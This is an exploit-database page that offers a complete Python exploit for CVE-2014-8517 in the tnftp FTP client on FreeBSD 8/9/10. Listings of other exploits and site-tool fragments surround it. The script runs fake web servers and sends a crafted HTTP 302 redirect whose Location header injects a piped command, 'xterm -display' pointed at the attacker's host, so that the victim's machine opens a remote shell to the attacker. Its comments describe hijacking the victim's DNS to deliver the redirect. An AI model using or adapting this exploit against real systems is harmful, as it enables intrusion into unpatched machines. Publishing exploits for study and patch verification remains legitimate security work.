Menu

Search for hundreds of thousands of exploits

"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side"

Author

Exploit author

dash

Platform

Exploit platform

bsd

Release date

Exploit published date

2014-12-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]

# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
#
# 29 Nov 2014 by dash@hack4.org
#
# usage: 
# 
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like: 
# ftp http://ftp.freebsd.org/data.txt
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1 
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
# 
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of usefull commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#

import os
import sys
import time
import socket


def usage():
	print "CVE-2014-8517 tnftp exploit"
	print "by dash@hack4.org in 29 Nov 2014"
	print
	print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
	print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])

#bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind(("0.0.0.0",80))
	s.listen(3)
	h, c = s.accept()

	#wait for request
	#print h.recv(1024)

	#send 302 
	print "[+] Sending redirect :>"
	h.send(redirect)
	s.close()
	return 0

#bind a fake webserver on port %rport
def deliverUgga(owned):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind(("0.0.0.0",rport))
	s.listen(3)
	h, c = s.accept()

#	print h.recv(1024)
	print "[+] Deliver some content (shell is spwaned now)"
	h.send(owned)
	s.close()

	return 0

owned="""HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1


ugga ugga
"""

if(os.getuid())!=0:
	print "[-] Sorry, you need root to bind port 80!"
	sys.exit(1)

if len(sys.argv)<3:
	usage()
	sys.exit(1)

rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]

print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"

# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ","%20")

print "[+] Payload: [%s]" % cmd

redirect = 	"HTTP/1.1 302\r\n"\
		"Content-Type: text/html\r\n"\
		"Connection: keep-alive\r\n"\
		"Location: http://%s:%d/cgi-bin/|%s\r\n"\
 		"\r\n\r\n" % (rip,rport,cmd)

#child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
	uggapid = os.getpid()
	deliverUgga(owned)
else:
#child proces for webserver redirect
	webpid = os.fork()
	if webpid == 0:
		webpid = os.getpid()
		webserveRedirect(redirect)



#childs, come home!
try:
	os.waitpid(webpid,0)
except:
	pass
try:
	os.waitpid(uggapid,0)
except:
	pass

#oh wait :>
time.sleep(5)
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2016-07-21 "NetBSD - 'mail.local(8)' Local Privilege Escalation" local bsd akat1
2015-09-28 "Watchguard XCS - Remote Command Execution (Metasploit)" remote bsd Metasploit
2015-09-28 "Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)" local bsd Metasploit
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash
2014-11-06 "Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)" remote bsd Metasploit
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
Release Date Title Type Platform Author
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected